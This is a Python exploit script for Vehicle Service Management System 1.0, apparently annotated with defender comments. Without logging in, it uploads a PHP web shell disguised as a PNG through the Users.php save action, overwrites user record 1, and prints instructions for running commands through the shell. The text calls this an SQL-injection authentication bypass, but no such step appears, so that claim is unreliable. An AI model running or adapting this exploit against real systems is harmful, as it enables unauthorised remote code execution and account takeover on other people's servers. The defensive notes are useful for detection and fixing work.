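Exploit for Vehicle Service Management System version 1.0: an unauthenticated remote shell upload that is described as using an authentication bypass with SQL injection. The listing below contains no SQL injection step; it posts the file straight to the Users.php save action on a session that never logs in.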
6c102a236cb9e21f5427c1ae2c9ecec8289f62748f674b9bd2f0e484459314c2
# Exploit Title: Vehicle Service Managment 1.0 - RCE (Unauthenticated)
# Date: 2021-10-02
# Exploit Author: RICHARD JONES
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10
import requests
# Base URL of the application instance (localhost as published).
HOST = "http://localhost"

# Save action of the application's Users class; the multipart upload is posted here.
UPLOAD_URL = "/vehicle_service/classes/Users.php?f=save"

# Fresh HTTP session. Nothing in this script sends a login request on it,
# so every request below goes out without an authenticated cookie.
s = requests.Session()
def sendShell():
    """POST a multipart form carrying a PHP file to the Users.php save action.

    The request goes out on the module-level session ``s``, which this script
    never logs in with, so it only succeeds against a server that accepts
    ``Users.php?f=save`` without an authenticated session. Follow-up hints
    are printed when the server answers HTTP 200; nothing is returned.

    Defender notes:
      * The uploaded part is named ``shell.php`` but declared as
        ``image/png``. A server that trusts the client-supplied content type,
        or does not restrict the stored extension, ends up holding an
        executable script in a web-reachable directory.
      * Per the messages printed below, the file is expected under
        ``/vehicle_service/uploads/`` with a server-time prefix. ``.php``
        files in that directory, and access-log entries requesting them with
        a ``c`` query parameter, are the artefacts to review.
      * The fix belongs on the server: require an authenticated session for
        the save action, allow-list image extensions and verify the content,
        and serve the upload directory without script execution.
    """
    # One-line PHP body that hands the ``c`` query parameter to system().
    php_body = "<?php system($_GET['c']);?>"

    # NOTE(review): "id": "1" presumably makes the save action update the
    # existing user record 1 instead of creating one — confirm against the
    # application's Users.php. If so, that account's name, username and
    # password are overwritten as a side effect, which is worth checking
    # during incident response.
    form_fields = dict(
        id="1",
        firstname="Adminstrator",
        lastname="fake",
        username="fake",
        password="fake",
    )

    # (filename, content, declared content type, extra part headers)
    upload_part = (
        "shell.php",
        php_body,
        "image/png",
        {"Content-Disposition": "form-data"},
    )

    # Hard-coded local HTTP proxy on 127.0.0.1:8080.
    proxy_map = {"http": "http://127.0.0.1:8080"}

    target = f"{HOST}{UPLOAD_URL}"
    response = s.post(
        target,
        data=form_fields,
        proxies=proxy_map,
        files={"img": upload_part},
    )

    # The status code is the only thing checked; the response body is not read.
    if response.status_code != 200:
        return

    print("[+] Shell upload successful")
    print(f"[-] Check in {HOST}/vehicle_service/uploads/ for the shell")
    print(f"[-] Usage: *shell.php?c=id")
    # Plain string, so "{SERVERTIME}" is printed literally; it presumably
    # stands for the timestamp prefix the server puts on the stored file name.
    print("[-] Ie: http://localhost/vehicle_service/uploads/{SERVERTIME}_shell.php?c=whoami")
def banner():
    """Return the script's ASCII-art banner as a raw multi-line string."""
    # Raw literal: the backslashes in the art are kept as-is, not as escapes.
    art = r"""
__ _______ __ __ __ ___
\ \ / / ____| \/ | /_ | / _ \
\ \ / / (___ | \ / | | || | | |
\ \/ / \___ \| |\/| | | || | | |
\ / ____) | | | | | || |_| |
\/ |_____/|_| |_| |_(_)___/
"""
    return art
# Script entry point. There is no __main__ guard, so importing this file
# also prints the banner and sends the upload request.
for line in (
    banner(),
    "Vehicle Service Managment 1.0 RCE ~ Created by Richard Jones",
    "[+] Trying shell upload",
):
    print(line)
sendShell()